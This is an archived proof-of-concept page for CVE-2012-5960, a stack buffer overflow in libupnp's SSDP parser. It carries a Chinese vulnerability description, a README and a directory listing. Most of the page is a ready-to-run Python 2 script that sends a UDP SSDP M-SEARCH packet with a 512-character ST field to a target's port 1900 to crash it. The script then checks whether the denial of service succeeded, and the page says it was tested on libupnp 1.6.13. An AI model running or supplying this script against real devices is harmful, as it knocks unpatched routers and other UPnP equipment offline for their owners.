Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2012-5960 PoC — UPnP Devices ‘unique_service_name’函数基于栈的缓冲区溢出漏洞

Source
https://github.com/finn79426/CVE-2012-5960-PoC
Associated Vulnerability
Title:UPnP Devices ‘unique_service_name’函数基于栈的缓冲区溢出漏洞 (CVE-2012-5960)
Description:libupnp是一个便携式开源的提供了API和开源代码的UPnP开发工具包。 UPnP Devices (又名libupnp,以前Intel SDK for UPnP设备)1.6.18之前版本中的便携式SDK中的SSDP解析器中的ssdp/ssdp_server.c中的‘unique_service_name’函数中存在基于栈的缓冲区溢出漏洞。通过UDP数据包中较长的UDN(又名upnp:rootdevice)字段,远程攻击者利用该漏洞执行任意代码。
Description
CVE-2012-5960, CVE-2012-5959 Proof of Concept
Readme
# CVE-2012-5960-PoC
CVE-2012-5960, CVE-2012-5959 Proof of Concept

隨手記錄一下最近玩的東西。

```python=
#!/usr/bin/python2
# -*- coding: utf-8 -*-
# Usage: python2 libupnp_DoS_PoC.py

import socket

TARGET = 'TARGET_IP'

'''
normal_traffic = \
    'M-SEARCH * HTTP/1.1\r\n'                   \
    'HOST:239.255.255.250:1900\r\n'             \
    'MX:3\r\n'                                  \
    'MAN:"ssdp:discover"\r\n'                   \
    'ST:upnp:rootdevice\r\n'                    \
    '\r\n'
'''

dos = \
    'M-SEARCH * HTTP/1.1\r\n'                   \
    'HOST:239.255.255.250:1900\r\n'             \
    'MX:3\r\n'                                  \
    'MAN:"ssdp:discover"\r\n'                   \
    'ST:uuid:schemas:device:{}:anything\r\n'    \
    '\r\n'.format("A"*512)

# Set up UDP socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.settimeout(1)
s.sendto(dos, (TARGET, 1900))

try:
    while True:
        data, addr = s.recvfrom(65507)  # Maximum UDP data length
        print "------------------------\nFailed DoS...\n------------------------\n"
        print "Response:"
        print addr, data
        exit(1)
except socket.timeout:
    print "------------------------\nSuccessful DoS!!!\n------------------------\n"
    exit(0)
```


Tested on libupnp 1.6.13:

![libupnp_1.6.13_CVEmarked](https://imgur.com/IhyUdp8.png)

Demo video:

[![](http://img.youtube.com/vi/3W3NO3nnKJM/0.jpg)](http://www.youtube.com/watch?v=3W3NO3nnKJM "")
File Snapshot

 [4.0K]  /data/pocs/39d473db7751cd111278a91909b89aee07a5c480
├── [1.2K]  libupnp_DoS_PoC.py
├── [1.5K]  README.md
└── [ 35K]  ssdp_server(libupnp_1.6.13).c

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.